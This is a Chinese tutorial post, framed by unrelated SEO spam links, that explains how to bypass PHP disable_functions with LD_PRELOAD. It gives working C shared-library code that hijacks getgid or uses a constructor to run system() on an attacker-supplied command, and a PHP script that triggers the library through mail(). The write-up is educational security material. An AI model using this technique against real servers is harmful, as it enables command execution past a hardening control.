当前位置: 首页 > wzjs >正文

鄂尔多斯市网站建设郑州有没有厉害的seo

鄂尔多斯市网站建设,郑州有没有厉害的seo,编程序可以做网站吗,汽车用品网站建设策划书借助这位师傅的文章来学习通过LD_PRELOAD来绕过disable_function的原理 【PHP绕过】LD_PRELOAD bypass disable_functions_phpid绕过-CSDN博客 感谢这位师傅的贡献 介绍 静态链接: (1)举个情景来帮助理解: 假设你要搬家&#x…

借助这位师傅的文章来学习通过LD_PRELOAD来绕过disable_function的原理

【PHP绕过】LD_PRELOAD bypass disable_functions_phpid绕过-CSDN博客

感谢这位师傅的贡献

介绍

静态链接:

(1)举个情景来帮助理解: 假设你要搬家,但家具不换,全部打包带走。

(2)优点:搬到新家后,直接开箱即用,不依赖外部资源(不去邻居家借洗衣机)

(3)缺点:搬家时行李又多又重(程序体积大),而且如果家具升级(比如库更新),得重新买一套再搬一次(重新编译程序)

(4)在编译时,所有依赖的库代码可直接嵌入到可执行文件中,程序独立运行,但体积较大,且库更新需重新编译程序

动态链接:

(1)举个情景来帮助理解:这次搬家,只带必需品,其他东西(比如工具书,电器)选择去附近的图书馆或共享商店按需借用。需要时随时去拿,用完归还。

(2)优点:行李轻便(程序体积小),多个家庭共享同一本书或工具(多个程序共享一个库),资源更新也方便(图书馆换新书)

(3)缺点:可能出现图书馆关门(库文件缺失)
(4)编译时不进行函数库的链接,而是在程序运行时才动态地载入所需的函数库。这样使得可执行文件体积较小,并且多个程序可以共享相同的动态库,节省内存资源。动态链接提高了程序的灵活性和可维护性。

再来了解一下什么是LD_PRELOAD

LD_PRELOAD 是linux/Unix系统中一个强大的环境变量,允许用户在程序运行时优先加载自定义的共享库,从而覆盖或替换标准库中的函数。

 也就是说,通过LD_PRELOAD指定的共享库会在程序启动时最先加载,其定义的函数会覆盖后续加载的同名函数。

用法

那么其利用方法很明显了,如果我们能在我们的自定义库中写入一些与”原本函数“ 作用不同 但同名 的函数,就能成功覆盖掉原本函数的用法了。

跟着师傅的例子再来了解一下

劫持getgid

看看id命令在执行过程中会用到的函数表

┌──(root㉿kali)-[~/Desktop]
└─# readelf -Ws /usr/bin/id     Symbol table '.dynsym' contains 74 entries:Num:    Value          Size Type    Bind   Vis      Ndx Name0: 0000000000000000     0 NOTYPE  LOCAL  DEFAULT  UND 1: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND endgrent@GLIBC_2.2.5 (2)2: 0000000000000000     0 FUNC    GLOBAL DEFAULT  UND getenv@GLIBC_2.2.5 (2)

 而这些函数都是可以被我们覆盖的,现在观察一下getgid函数的内容,输入 man getgid

 构造一个与之原型相同的函数

#include<stdlib.h>
#include<unistd.h>
#include<sys.types.h>gid_t getgid(void){unsetenv("LD_PRELOAD");// 使用unsetenv删除原有的共享库system("'echo 'I hacked U!!\n' > successful");
}

运行指令

gcc --shared -fPIC rob.c -o rob.so

 

 接下来,载入这个库并运行id命令

┌──(root㉿kali)-[~/test]
└─# LD_PRELOAD=./rob.so id
uid=0(root) gid=0(root) groups=0(root)

 得到successful文件

这就是一次劫持操作

绕过disable_function

当题目中有disable_function的限制时,会导致我们拿到的shell都是空的,这时就要想办法绕过disable_function。其实我们要实现的操作主要是执行命令,可以使用LD_PRELOAD环境变量强制该程序优先加载一个恶意共享库(.so文件),覆盖其调用的标准库函数(如getuid()),从而执行任意代码

编写恶意文件

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加载库的同时执行函数unsetenv("LD_PRELOAD");system("ls > hackfile");// 用于php
}

 运行指令

┌──(root㉿kali)-[~/test]
└─# gcc --shared -fPIC hack.c -o hack.so

编写hack.php文件

<?php
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>

此时再执行,就可以成功劫持了

┌──(root㉿kali)-[~/test]
└─# php hack.php
sh: 1: /usr/sbin/sendmail: not found
1
hack.c
hack.php
hack.so
hackfile
rob.c
rob.so
successful

 同时,这位师傅还给出了手动输入参数的做法,真的很厉害

将hack.c改为:

#include<stdlib.h>
#include<unistd.h>
#include<sys/types.h>__attribute__((constructor)) void hack(void){
// 使用__attribute__((constructor)) 可以在加载库的同时执行函数unsetenv("LD_PRELOAD");char *cmd=getenv("MY_CMD");system(cmd);
}

再将hack.php改为:

<?php
$a=$argv[1];
$cmd="$a > hackfile";
@putenv("MY_CMD=".$cmd);
putenv("LD_PRELOAD=./hack.so");
mail("","","","");
echo file_get_contents("hackfile");
?>

 就可以这样运行代码了:

┌──(root㉿kali)-[~/test]
└─# php hack.php id
sh: 1: /usr/sbin/sendmail: not found
uid=0(root) gid=0(root) groups=0(root)

前几天看了一篇推文,发觉对漏洞和工具的原理还是要去理解。感谢师傅提供的思路和方法!

http://www.dtcms.com/wzjs/327443.html

相关文章:

  • 网站开发可以自学吗网站收录免费咨询
  • 网站建设费用是什么科目百度相册登录入口
  • 阿里云能放企业网站吗seo技术公司
  • 广东手机网站建设价格低网络软文是什么意思
  • 九龙坡网站建设兴安盟新百度县seo快速排名
  • 便宜网站制作百度指数数据分析
  • win10 网站建设软件竞价托管公司排名
  • wordpress主题上传专业网站seo推广
  • 高端的咨询行业网站策划百度怎么优化关键词排名
  • 免费公司网站主页模板河南疫情最新消息
  • java如何做网站的教程广州搜索seo网站优化
  • 域名邮箱如何注册推广优化网站排名
  • 东莞政府网站建设seo的含义是什么意思
  • 网站建设贰金手指下拉贰壹搜索引擎优化的技巧
  • 网站建设与维护工作西安网站推广
  • wordpress做双语网站淘词神器
  • 香港永久网站外链发布的平台最好是
  • 关于自行建设门户网站的请示seo1域名查询
  • 关于网站备案的44个问题模板建站哪个平台好
  • 丽水网站开发海外推广营销 平台
  • 青岛 机械 中企动力提供网站建设广州网站定制多少钱
  • 纳森网络做网站多少钱搜索引擎市场份额2023
  • 郑州网站建设价位seo网站推广软件 快排
  • 地产网站建设互动营销铜川网络推广
  • wordpress上传网上打不开seo整站优化哪家好
  • 动态html做网站背景全媒体运营师培训
  • 滕州网站制作新站如何让百度快速收录
  • 哪个网站能找到做夜场的女孩seo优化与推广招聘
  • 微信公众号接口文档快速seo优化
  • 网站解析需要什么公司企业网站制作需要多少钱